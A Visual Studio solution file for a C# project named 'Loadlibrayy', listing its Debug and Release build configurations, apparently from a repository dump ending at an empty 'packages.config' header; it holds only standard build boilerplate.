Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Loadlibrayy", "Loadlibrayy.csproj", "{D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU Debug|x64 = Debug|x64 Release|Any CPU = Release|Any CPU Release|x64 = Release|x64 EndGlobalSection GlobalSection(ProjectConfigurationPlatforms) = postSolution {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Debug|Any CPU.ActiveCfg = Debug|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Debug|Any CPU.Build.0 = Debug|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Debug|x64.ActiveCfg = Debug|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Debug|x64.Build.0 = Debug|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Release|Any CPU.ActiveCfg = Release|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Release|Any CPU.Build.0 = Release|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Release|x64.ActiveCfg = Release|Any CPU {D35BB6BE-80A3-4983-A9EC-DC51B1B36E12}.Release|x64.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE EndGlobalSection EndGlobal ================================================ FILE: packages.config ================================================